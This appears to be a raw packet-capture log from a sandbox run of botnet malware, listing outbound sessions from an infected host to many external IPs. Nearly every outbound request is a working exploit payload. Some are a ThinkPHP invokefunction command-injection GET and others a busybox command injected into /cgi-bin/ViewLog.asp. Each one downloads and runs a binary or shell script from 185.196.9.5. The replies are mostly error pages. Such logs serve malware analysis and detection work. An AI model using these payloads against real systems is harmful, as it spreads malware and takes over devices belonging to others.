Feb 25, 2024 19:04:26.432646990 CET	333	IN	HTTP/1.1 400 Bad Request Server: Web server Date: Sun, 25 Feb 2024 18:04:25 GMT Content-Type: text/html Content-Length: 171 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
814	192.168.2.15	57672	95.101.172.218	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:25.939074993 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:26.277559996 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:26.532157898 CET	479	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Sun, 25 Feb 2024 18:04:26 GMT Date: Sun, 25 Feb 2024 18:04:26 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 64 65 34 35 36 38 26 23 34 36 3b 31 37 30 38 38 38 34 32 36 36 26 23 34 36 3b 35 36 34 66 33 38 30 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.4de4568.1708884266.564f3804</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
815	192.168.2.15	42098	31.222.233.68	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.454696894 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
816	192.168.2.15	59444	31.200.3.44	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.465888977 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
817	192.168.2.15	52442	31.200.105.252	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.467506886 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
818	192.168.2.15	34874	62.29.11.218	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.474364042 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
819	192.168.2.15	57154	62.238.130.223	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.649287939 CET	322	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
820	192.168.2.15	48434	31.165.180.243	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.656270981 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
821	192.168.2.15	45802	94.122.57.103	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.687984943 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
822	192.168.2.15	39016	94.122.63.233	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.695611000 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
823	192.168.2.15	34060	94.176.148.227	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.864882946 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
824	192.168.2.15	60584	94.120.209.66	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.908427954 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
825	192.168.2.15	51560	94.122.73.3	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.909531116 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
826	192.168.2.15	50494	94.120.235.47	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.909646988 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
827	192.168.2.15	33038	62.29.82.129	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:27.919171095 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
828	192.168.2.15	34876	112.158.154.185	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:28.518964052 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
829	192.168.2.15	39778	95.157.62.116	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:28.724864960 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:28.929203987 CET	404	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:28 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
830	192.168.2.15	47296	95.253.23.12	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:28.730258942 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
831	192.168.2.15	34402	95.209.153.103	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:28.760806084 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:29.010668039 CET	502	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Sun, 25 Feb 2024 18:04:33 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
832	192.168.2.15	43526	112.175.93.33	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:29.105237007 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:29.392205000 CET	179	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>apache</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
833	192.168.2.15	44908	112.74.126.135	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:29.252304077 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:29.574732065 CET	318	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:29 GMT Content-Type: text/html Content-Length: 166 Connection: close Via: HTTP/1.1 SLB.32 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
834	192.168.2.15	34548	94.123.80.84	8080

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:29.937391043 CET	310	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 185.196.9.5:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 38 35 2e 31 39 36 2e 39 2e 35 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68 Data Ascii: /bin/busybox wget http://185.196.9.5/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
835	192.168.2.15	56168	112.124.202.221	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:30.896341085 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:31.211688042 CET	318	IN	HTTP/1.1 400 Bad Request Date: Sun, 25 Feb 2024 18:04:31 GMT Content-Type: text/html Content-Length: 166 Connection: close Via: HTTP/1.1 SLB.90 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
836	192.168.2.15	51746	88.213.245.224	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:31.084350109 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 25, 2024 19:04:31.273720026 CET	364	IN	HTTP/1.1 505 HTTP Version not supported Content-Type: text/html; charset=utf-8 Content-Length: 140 Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly Connection: close Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 35 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>505 HTTP Version not supported</title></head><body><center><h1>505 HTTP Version not supported</h1></center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
837	192.168.2.15	43356	88.196.166.130	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:31.113056898 CET	318	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
838	192.168.2.15	38450	88.147.191.76	80

Timestamp	Bytes transferred	Direction	Data
Feb 25, 2024 19:04:31.134355068 CET	330	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://185.196.9.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
